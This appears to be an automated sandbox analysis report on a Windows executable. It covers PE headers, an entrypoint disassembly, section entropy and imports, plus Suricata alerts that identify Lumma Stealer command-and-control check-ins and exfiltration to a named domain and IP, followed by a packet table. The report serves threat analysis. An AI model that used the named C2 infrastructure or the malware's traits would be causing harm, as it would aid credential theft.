File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...c.vg.................F........................@.......................................@.............................Z...J...(..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x409eb0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x67769663 [Thu Jan 2 13:36:35 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	3ccbd572e5c574aa059c8de8b80553b8

Entrypoint Preview

Instruction
call 00007FF415352A0Ah
jmp 00007FF41535286Dh
mov ecx, dword ptr [004307C0h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007FF415352A06h
test esi, ecx
jne 00007FF415352A28h
call 00007FF415352A31h
mov ecx, eax
cmp ecx, edi
jne 00007FF415352A09h
mov ecx, BB40E64Fh
jmp 00007FF415352A10h
test esi, ecx
jne 00007FF415352A0Ch
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [004307C0h], ecx
not ecx
pop edi
mov dword ptr [00430800h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [0042E974h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [0042E92Ch]
xor dword ptr [ebp-04h], eax
call dword ptr [0042E928h]
xor dword ptr [ebp-04h], eax
lea eax, dword ptr [ebp-14h]
push eax
call dword ptr [0042E9BCh]
mov eax, dword ptr [ebp-10h]
lea ecx, dword ptr [ebp-04h]
xor eax, dword ptr [ebp-14h]
xor eax, dword ptr [ebp-04h]
xor eax, ecx
leave
ret
mov eax, 00004000h
ret
push 00431B68h
call dword ptr [0042E994h]
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov al, 01h
ret
push 00030000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2e6f0	0x5a	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2e74a	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x34000	0xe8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x35000	0x1bcc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2a9a8	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x26e40	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2e8c8	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x244ba	0x24600	c38052d5842cd8b07c8f812eb6910b36	False	0.5554459299828178	data	6.570338615727902	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x26000	0x9f74	0xa000	3370e0b3d540bf8efa1a09679e10d998	False	0.4305419921875	DOS executable (COM)	4.93781731386841	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x30000	0x2330	0x1600	e21ea4dbd16bf9c0820f2949a9c56684	False	0.3952414772727273	data	4.576677467448693	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x33000	0x9	0x200	1f354d76203061bfdd5a53dae48d5435	False	0.033203125	data	0.020393135236084953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x34000	0xe8	0x200	03d6bf5d1e31277fc8fb90374111d794	False	0.306640625	data	2.344915704357875	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x35000	0x1bcc	0x1c00	43927976336ae0c9a639d5f9efc7a7d3	False	0.7833426339285714	data	6.549002942674606	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.BSS	0x37000	0x50800	0x50800	46029f298e6ff67983eb46d6d69e0777	False	1.0003366411102483	data	7.999374639049402	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x34060	0x87	XML 1.0 document, ASCII text	English	United States	0.8222222222222222

Imports

DLL

Import

KERNEL32.dll

AcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObject, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile

Exports

Name	Ordinal	Address
_SerializeData@16	1	0x401e90

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T14:33:57.173114+0100	2058656	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)	1	192.168.2.5	61487	1.1.1.1	53	UDP
2025-01-03T14:33:57.665182+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49704	104.21.32.1	443	TCP
2025-01-03T14:33:57.665182+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	104.21.32.1	443	TCP
2025-01-03T14:33:58.123850+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49704	104.21.32.1	443	TCP
2025-01-03T14:33:58.123850+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49704	104.21.32.1	443	TCP
2025-01-03T14:33:58.596355+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49705	104.21.32.1	443	TCP
2025-01-03T14:33:58.596355+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	104.21.32.1	443	TCP
2025-01-03T14:33:59.081538+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49705	104.21.32.1	443	TCP
2025-01-03T14:33:59.081538+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	104.21.32.1	443	TCP
2025-01-03T14:33:59.785500+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49706	104.21.32.1	443	TCP
2025-01-03T14:33:59.785500+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	104.21.32.1	443	TCP
2025-01-03T14:34:01.112954+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49707	104.21.32.1	443	TCP
2025-01-03T14:34:01.112954+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49707	104.21.32.1	443	TCP
2025-01-03T14:34:02.251726+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49708	104.21.32.1	443	TCP
2025-01-03T14:34:02.251726+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	104.21.32.1	443	TCP
2025-01-03T14:34:04.770372+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49709	104.21.32.1	443	TCP
2025-01-03T14:34:04.770372+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49709	104.21.32.1	443	TCP
2025-01-03T14:34:12.365477+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49709	104.21.32.1	443	TCP
2025-01-03T14:34:13.270327+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49710	104.21.32.1	443	TCP
2025-01-03T14:34:13.270327+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49710	104.21.32.1	443	TCP
2025-01-03T14:34:15.612275+0100	2058657	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)	1	192.168.2.5	49716	104.21.32.1	443	TCP
2025-01-03T14:34:15.612275+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49716	104.21.32.1	443	TCP
2025-01-03T14:34:16.050117+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49716	104.21.32.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 14:33:57.191173077 CET	49704	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:57.191231012 CET	443	49704	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:57.191302061 CET	49704	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:57.192483902 CET	49704	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:57.192498922 CET	443	49704	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:57.665050983 CET	443	49704	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:57.665182114 CET	49704	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:57.677970886 CET	49704	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:57.677989006 CET	443	49704	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:57.678308964 CET	443	49704	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:57.720886946 CET	49704	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:57.720902920 CET	49704	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:57.720968962 CET	443	49704	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:58.123867989 CET	443	49704	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:58.123958111 CET	443	49704	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:58.124007940 CET	49704	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:58.125361919 CET	49704	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:58.125380039 CET	443	49704	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:58.125407934 CET	49704	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:58.125413895 CET	443	49704	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:58.135754108 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:58.135797977 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:58.135863066 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:58.136162996 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:58.136178970 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:58.596210957 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:58.596354961 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:58.597665071 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:58.597678900 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:58.598021984 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:58.599302053 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:58.599332094 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:58.599407911 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.081526041 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.081584930 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.081636906 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.081666946 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.081702948 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.081749916 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.081758022 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.081964016 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.081998110 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.082014084 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.082021952 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.082062006 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.082067966 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.086436987 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.086491108 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.086498976 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.131562948 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.131596088 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.168361902 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.168414116 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.168427944 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.168437958 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.168487072 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.168493032 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.168540955 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.168582916 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.168719053 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.168735027 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.168745995 CET	49705	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.168751001 CET	443	49705	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.312927961 CET	49706	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.312999010 CET	443	49706	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.313067913 CET	49706	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.313441038 CET	49706	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.313455105 CET	443	49706	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.785409927 CET	443	49706	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.785500050 CET	49706	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.786705971 CET	49706	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.786716938 CET	443	49706	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.787039042 CET	443	49706	104.21.32.1	192.168.2.5
Jan 3, 2025 14:33:59.788378000 CET	49706	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.788556099 CET	49706	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:33:59.788589954 CET	443	49706	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:00.515064001 CET	443	49706	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:00.515173912 CET	443	49706	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:00.515238047 CET	49706	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:00.515403032 CET	49706	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:00.515419960 CET	443	49706	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:00.648340940 CET	49707	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:00.648379087 CET	443	49707	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:00.648452997 CET	49707	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:00.648758888 CET	49707	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:00.648777008 CET	443	49707	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:01.112876892 CET	443	49707	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:01.112953901 CET	49707	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:01.114280939 CET	49707	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:01.114294052 CET	443	49707	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:01.114535093 CET	443	49707	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:01.115803957 CET	49707	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:01.116028070 CET	49707	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:01.116079092 CET	443	49707	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:01.116141081 CET	49707	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:01.163336039 CET	443	49707	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:01.614913940 CET	443	49707	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:01.615025043 CET	443	49707	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:01.615086079 CET	49707	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:01.615223885 CET	49707	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:01.615243912 CET	443	49707	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:01.797843933 CET	49708	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:01.797897100 CET	443	49708	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:01.797988892 CET	49708	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:01.798316956 CET	49708	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:01.798337936 CET	443	49708	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:02.251594067 CET	443	49708	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:02.251725912 CET	49708	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:02.253402948 CET	49708	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:02.253420115 CET	443	49708	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:02.253654957 CET	443	49708	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:02.255286932 CET	49708	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:02.255444050 CET	49708	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:02.255481958 CET	443	49708	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:02.255549908 CET	49708	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:02.255562067 CET	443	49708	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:03.881117105 CET	443	49708	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:03.881233931 CET	443	49708	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:03.881294012 CET	49708	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:03.881469965 CET	49708	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:03.881489038 CET	443	49708	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:04.317738056 CET	49709	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:04.317805052 CET	443	49709	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:04.317877054 CET	49709	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:04.318181038 CET	49709	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:04.318195105 CET	443	49709	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:04.770279884 CET	443	49709	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:04.770371914 CET	49709	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:04.771594048 CET	49709	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:04.771605015 CET	443	49709	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:04.771838903 CET	443	49709	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:04.773121119 CET	49709	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:04.773248911 CET	49709	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:04.773257017 CET	443	49709	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:12.365458965 CET	443	49709	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:12.365571976 CET	443	49709	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:12.365746975 CET	49709	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:12.365869045 CET	49709	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:12.365885019 CET	443	49709	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:12.808293104 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:12.808365107 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:12.808453083 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:12.808756113 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:12.808794022 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.270239115 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.270327091 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.281821966 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.281862974 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.282104969 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.283196926 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.283981085 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.284029961 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.284162998 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.284218073 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.284348965 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.284403086 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.284574032 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.284631968 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.285200119 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.285263062 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.285480022 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.285525084 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.285545111 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.285576105 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.285734892 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.285777092 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.285820007 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.285903931 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.285963058 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.294202089 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.294456005 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.294512033 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.294557095 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.294599056 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:13.294702053 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:13.297753096 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:15.069550991 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:15.069643974 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:15.069719076 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:15.069938898 CET	49710	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:15.069956064 CET	443	49710	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:15.141700983 CET	49716	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:15.141746998 CET	443	49716	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:15.141850948 CET	49716	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:15.142456055 CET	49716	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:15.142469883 CET	443	49716	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:15.612202883 CET	443	49716	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:15.612274885 CET	49716	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:15.613571882 CET	49716	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:15.613583088 CET	443	49716	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:15.613817930 CET	443	49716	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:15.620524883 CET	49716	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:15.620541096 CET	49716	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:15.620592117 CET	443	49716	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:16.050142050 CET	443	49716	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:16.050266981 CET	443	49716	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:16.050316095 CET	49716	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:16.050719023 CET	49716	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:16.050741911 CET	443	49716	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:16.050753117 CET	49716	443	192.168.2.5	104.21.32.1
Jan 3, 2025 14:34:16.050759077 CET	443	49716	104.21.32.1	192.168.2.5
Jan 3, 2025 14:34:17.404647112 CET	64588	53	192.168.2.5	1.1.1.1
Jan 3, 2025 14:34:17.409420013 CET	53	64588	1.1.1.1	192.168.2.5
Jan 3, 2025 14:34:17.409478903 CET	64588	53	192.168.2.5	1.1.1.1
Jan 3, 2025 14:34:17.414288044 CET	53	64588	1.1.1.1	192.168.2.5
Jan 3, 2025 14:34:17.872384071 CET	64588	53	192.168.2.5	1.1.1.1
Jan 3, 2025 14:34:17.877454042 CET	53	64588	1.1.1.1	192.168.2.5
Jan 3, 2025 14:34:17.877657890 CET	64588	53	192.168.2.5	1.1.1.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
